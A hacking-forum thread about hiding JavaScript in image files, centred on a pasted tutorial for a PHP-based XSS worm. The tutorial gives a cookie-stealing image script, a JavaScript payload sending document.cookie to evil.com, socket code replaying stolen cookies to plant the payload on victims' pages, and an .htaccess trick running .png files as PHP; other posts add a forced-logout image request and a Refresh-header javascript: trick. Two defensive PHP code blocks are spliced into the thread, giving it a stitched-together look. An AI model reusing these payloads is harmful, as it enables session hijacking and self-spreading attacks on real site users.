HellBound Hackers | Events | General

javascript in an image?

Posted by Guest on 01-09-07 03:08
Can I put javascript in an image? If so how do I? Or what could I do to make a popup and the only way to close it is click Ok and the Ok be a link?


RE: javascript in an image?

Posted by Guest on 01-09-07 03:10
You can put JS in an image like this (very simple way):
Code
<script>alert(String.fromCharCode(79, 119, 110, 101, 100, 32, 98, 121, 32, 101, 110, 100, 51, 114))</script>

Then save it as x.bmp or x.jpg, whichever, on a site as a file by itself, and link to it, and you've got it.


RE: javascript in an image?

Posted by Guest on 01-09-07 03:19
Thank you very much!


RE: javascript in an image?

Posted by Guest on 01-09-07 03:25
no problem


RE: javascript in an image?

Posted by Guest on 01-09-07 04:07
Hey, could someone make me an image with code that executes whenever the page is loaded? I need the link to be /?logout


RE: javascript in an image?

Posted by Guest on 01-09-07 07:40
Ok, you asked for help, and someone gave it to you. You need to learn how to do it yourself now. The whole point is to LEARN. I'm not trying to be a dick, but there are worse posts you could get than this.


RE: javascript in an image?

Posted by Guest on 01-09-07 09:19
First, that isn't an image; it is just an HTML file with another extension. You need trial and error to make that work inside a real image. From what I know, this doesn't work directly in Firefox. You must do another trick to make it work in Firefox, but I will not tell you the trick; I'll let you discover it.
I want to say that if you go, let's say, to

http://blah.com/js_in_img.jpg

with Firefox, and that file contains what end3r suggested, then you will get something like
File contains an error

or another thing that says "You Failed".

But in Internet Explorer (tested on 6.0.2180) it works without that trick.

Here is an example, access it with FF and then IE:
http://droptix.it. . .m/test.jpg
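The difference this post describes between Firefox and IE 6 comes down to content sniffing: the bytes are HTML, the extension says image, and one browser believes the bytes. The following is an added defender-side example, not code from the thread or from any poster: a server that hosts user-supplied images checks that the uploaded bytes actually begin with an image signature and agree with the claimed extension, refuses anything that looks like markup, and serves stored images with an explicit Content-Type plus X-Content-Type-Options: nosniff (a header browsers added after the IE 6 era) so the browser never reinterprets them as HTML. The signature table, the markup heuristic and the accepted-extension list are this example's assumptions.

```php
<?php
// Added defender-side example (not code from the thread): reject "images"
// that are really HTML/script, and describe the headers a real image should
// be served with so the browser does not sniff it into HTML.
declare(strict_types=1);

// MIME type implied by the file's leading bytes, or null if the bytes do not
// start with a known image signature (table is an assumption of this example).
function sniffImageType(string $bytes): ?string
{
    $signatures = [
        "\x89PNG\r\n\x1a\n" => 'image/png',
        "\xFF\xD8\xFF"      => 'image/jpeg',
        'GIF87a'            => 'image/gif',
        'GIF89a'            => 'image/gif',
        'BM'                => 'image/bmp',
    ];
    foreach ($signatures as $magic => $mime) {
        if (strncmp($bytes, $magic, strlen($magic)) === 0) {
            return $mime;
        }
    }
    return null;
}

// True if the leading bytes look like markup or script. Renaming a file to
// .jpg does not change its bytes, so the thread's <script> file is caught here.
function looksLikeMarkup(string $bytes): bool
{
    $head = strtolower(substr($bytes, 0, 512));
    return preg_match('/<\s*(script|html|!doctype|body|iframe|meta|img|svg)/', $head) === 1;
}

// Decide whether an upload may be stored and served as an image:
// known extension, matching signature, and no markup in the first bytes.
function isSafeImageUpload(string $bytes, string $filename): bool
{
    $ext   = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    $byExt = [
        'png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
        'gif' => 'image/gif', 'bmp' => 'image/bmp',
    ];
    if (!isset($byExt[$ext])) {
        return false;
    }
    return sniffImageType($bytes) === $byExt[$ext] && !looksLikeMarkup($bytes);
}

// Headers to send when serving a stored image: explicit type, no sniffing,
// and inline disposition so it is displayed rather than downloaded.
function imageResponseHeaders(string $mime): array
{
    return [
        'Content-Type'           => $mime,
        'X-Content-Type-Options' => 'nosniff',
        'Content-Disposition'    => 'inline',
    ];
}

// Constructed samples: the thread's script-as-image, and the first bytes of
// a real PNG (signature plus the start of the IHDR chunk).
$scriptAsJpg = '<script>alert(1)</script>';
$realPng     = "\x89PNG\r\n\x1a\n" . "\x00\x00\x00\x0dIHDR";

var_dump(isSafeImageUpload($scriptAsJpg, 'x.jpg'));
var_dump(isSafeImageUpload($realPng, 'x.png'));
var_dump(isSafeImageUpload($realPng, 'x.php'));
print_r(imageResponseHeaders(sniffImageType($realPng)));
```

The signature check is intentionally strict about extension and signature agreeing: a PNG uploaded as .jpg is rejected rather than silently relabelled, because a mismatch is exactly the situation a sniffing browser would resolve on its own. For production uploads a practitioner would additionally re-encode the image with an image library, which discards any trailing payload the signature check cannot see.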


RE: javascript in an image?

Posted by Guest on 01-09-07 10:02
A fun way is to use HTTP's Refresh header to cause a reload directed towards javascript:...
Of course this means it only works if they view the image on its own, not if it's embedded in some page.
For a demo see this link: [sid.selfip.org]. The link may die on occasion.

Edited on 01-09-07 10:04
RE: javascript in an image?

Posted by mido (Member, Cairo, Egypt, 613 posts, joined 27.01.07, rank Monster) on 01-09-07 10:29
Very nice trick. I loved it!


www.hellboundhackers.org/sig/r/16019.png

mido_eg3[at]hotmail.com
RE: javascript in an image?

Posted by Guest on 01-09-07 14:16
Yeah, you can. Both JS and server side. I wrote a tutorial on how to use PHP to build an XSS worm. Incidentally, the cookie stealer portion uses an image. I pasted the tutorial below so you can see how to make additional requests to pages, etc. with server side code combined with javascript and post variables. You will also be able to inject JS using this method. Some slight modifications to this code will allow you to inject JS into your image (although, in a sense, you already are in this method, though indirectly) -- but I find having the image do all the work a far superior approach. Why code something in JS if you can do it in PHP in half the lines? Now, there are instances in which you must use only JS, but so long as you are using an image, this method will work. Perhaps not for stealing a cookie, but with some modifications you don't even need to stick the ?cookie=document.cookie onto the end of your XSS attack -- you can have the PHP image do that work for you, too.

Since I know the formatting will screw up, here is a link so you can DL it: http://picobsd.amdwebhost.com/~cfc/xss.txt.gz

DISCLAIMER: THE CODE IN THIS TUTORIAL WAS EDITED TO ENSURE THAT IT DOES NOT WORK PROPERLY. THIS WAS DONE ON PURPOSE TO AVOID THE USE OF THIS CODE FOR ILLEGITIMATE PURPOSES. THE CODE IS FOR POC PURPOSES ONLY, MEANT TO DEMONSTRATE THE EXTENSION OF XSS HOLES. DON'T DO BAD STUFF, CAUSE IT'S NOT ON ME IF YOU DO.


A while back, I was poking around a web 2.0 site. I noticed something rather interesting: every single preference for users had its own file. This was probably done because the site, which was AJAX based, modified user information via AJAX, and therefore oftentimes there was only one value being edited at a time. I started poking around these, and I found out early on that all data sanitization was done with Javascript. I'm assuming this is because the developer was more comfortable with javascript, and didn't use PHP for anything except what he had to (editing database fields, etc.). Because filtering was done via javascript, I figured it wasn't done on the PHP side (I was correct), so if I could access the file directly, I was in business.

It worked. site.com/users_neighborhood.php was accessible, and when I edited my neighbourhood, I was able to insert a cookie stealer. The cookie stealer employed my favourite concept, albeit not always possible: the image. Which brings me to my first segment of code, the cookie stealer itself:
Code
<?php
 $data = $_GET['data'];             #get the cookie

 #create image
 header("Content-type: image/png"); #this is a PNG file
 $image = imagecreate(1,1);         #create a 1x1 image
 imagecolorallocate(1,1,1);         #set BG to white
 imagepng($image);                  #display the image
 imagedestroy($image);              #delete image from temp memory

 #store cookie
 $fp = fopen("misc.html","r");      #open log file and append it
 fputs($fp, $data."<br>");          #add the data
 fclose($fp);                       #close file
?>
This code simply created a PNG image and set the file's output content-type to PNG.

And the Javascript looked like this:
<script>document.write("<img src='http://evil.com/image.php?data=" document.cookie "'>");</script>

So, easy part down. Next is the propagation technique. I had a PHP program, and it contains a variable with the entire cookie in it. So the obvious thing to do at this point was to use sockets to connect to our target site's users_neighborhood.php page with the hijacked cookie. I did this by opening a socket and passing data to it. Here's the code:
Code
<?PHP
 #Connect Data
 $host   = "site.com";                #URL
 $page   = "/users_neighborhood.php"; #page
 $agent  = "BorgBrowser";             #user agent, used to specify the browser/program (googlebot, mozilla firefox, etc.)
 $cookie = $data;                     #The cookie from above
 $xss    = "%3Cscript%3Edocument.write%28%22%3Cimg%20src%3D%27http%3A//evil.com/image.php%3Fdata%3D%22+document.cookie+%22%27%3E%22%29%3B%3C/script%3E"; #A URL encoded version of the XSS attack
 $attack   = "neighborhood=".$xss;      #POST data with the XSS attack in it.
?>
This section of code just set up all the variables used later.

Code
<?php
 #Make Packet
 function makePacket($host, $page, $agent, $rnum, $cookie, $data)
 {
  #Generate the packet
  $packet  = "POST  ".$page." HTTP/1.1\r\n";                        #POST to the users_neighborhood page
  $packet .= "Host: ".$host."\r\n";                                 #specify the host
  $packet .= "User-Agent: ".$agent."\r\n";                          #specify the user agent
  $packet .= "Content-type: application/x-www-form-urlencoded\r\n"; #the content type
  $packet .= "Content-length: ".strlen($data)."\r\n";               #the content length, found by str_len, which finds the length of a variable
  $packet .= "Set-Cookie: ".$cookie."\r\n";                         #And, set the cookie
  $packet .= $attack;                                               #and finally, our payload

  #return packet
  return  $packet;                                                  #return the packet
 }
?>
This section is a function which allows us to create a valid HTTP/1.1 packet with POST data and cookie data in it.

Code
<?php
 #open network connection
 $port         = getservbyname('www', 'tcp');                  #get the TCP port the WWW service uses
 $addr         = gethostbyname($host);                         #get the address of our host, as defined above
 $socket       = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); #create a socket
 $result       = socket_connect($socket, $addr, $port);        #connect to the host on the WWW's port
?>

This section created our network connection to the site.

Code

<?php
 #Send Data
 $in = makePacket($host, $page, $agent, $rnum, $cookie, $data); #Get the output of the makePacket function created above
 socket_write($socket, $in, strlen($in));                       #write to the socket the packet

 #close network connection
 socket_close($socket);                                         #Close the socket connection
?>

This section of code wrote the HTTP packet to the site.

What we have done is used the XSS exploit in the site to steal the cookie. Our cookie stealer script not only logs cookies, but it is also used to authenticate us as that user and grant us the ability to edit THEIR content, and steal cookies using their page as well.

/end


One modification you can make to the code: use .png instead of .php for your file name (modify the XSS attack code accordingly), and drop this in the same folder with the name .htaccess (note the dot at the beginning):
Code
AddType application/x-httpd-php png

This will force your server to see any file with a PNG extension as a PHP file.

Edited on 01-09-07 14:24
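The tutorial's root cause is stated plainly in its own narrative: sanitization happened only in JavaScript, so posting directly to users_neighborhood.php bypassed it, and the session cookie was readable from document.cookie. The following is an added example from the defender's side, not the tutorial's code and not from the site it describes: the stored value is treated as plain text and HTML-encoded at output time on the PHP side, and the session cookie is issued with HttpOnly (so document.cookie cannot read it), Secure and SameSite. The field name, the length cap, and the control-character stripping are assumptions of this example; the sample POST body is the tutorial's own URL-encoded payload, decoded the way PHP would decode it into $_POST.

```php
<?php
// Added defender-side example (not the tutorial's code): server-side output
// encoding for the "neighborhood" value and session cookie flags that keep
// the cookie out of reach of injected JavaScript.
declare(strict_types=1);

// Store what the user sent as plain text. The length cap and the removal of
// control characters are assumptions of this example (mbstring assumed).
function normalizeNeighborhood(string $raw): string
{
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $raw) ?? '';
    return mb_substr(trim($clean), 0, 80);
}

// Encode at output time, the step the original site skipped on the PHP side.
// ENT_QUOTES also encodes single quotes, which matters inside attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function renderNeighborhood(string $stored): string
{
    return '<span class="neighborhood">'
        . htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8')
        . '</span>';
}

// Cookie options: HttpOnly keeps document.cookie from reading the session id,
// so the img-src exfiltration in the tutorial carries nothing useful; Secure
// and SameSite limit where the cookie is sent at all.
function sessionCookieOptions(): array
{
    return [
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ];
}

// Apply the options before the session cookie is issued (PHP 7.3+ signature).
function startHardenedSession(): void
{
    session_set_cookie_params(sessionCookieOptions());
    session_start();
}

// Constructed sample: the tutorial's POST body, URL-decoded as PHP would
// decode it into $_POST['neighborhood'].
$payload = urldecode(
    '%3Cscript%3Edocument.write%28%22%3Cimg%20src%3D%27http%3A//evil.com/image.php'
    . '%3Fdata%3D%22+document.cookie+%22%27%3E%22%29%3B%3C/script%3E'
);
$stored = normalizeNeighborhood($payload);

// The rendered markup contains no "<" or quote characters from the payload,
// so the browser shows the text instead of running it.
echo renderNeighborhood($stored), PHP_EOL;
```

Two notes on the design. Encoding belongs at output rather than at input so that the stored value stays usable in other contexts (JSON, plain-text e-mail) without double-encoding, and so that a second entry point like the direct POST in the tutorial cannot skip it. The .htaccess AddType trick at the end of the post depends on Apache honouring per-directory overrides in the upload folder; a host that sets AllowOverride None for that directory and serves uploads from a location with no script handler removes that path as well.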
RE: javascript in an image?

Posted by mido (Member, Cairo, Egypt, 613 posts, joined 27.01.07, rank Monster) on 01-09-07 14:31
People can come up with really very nice information in this thread.

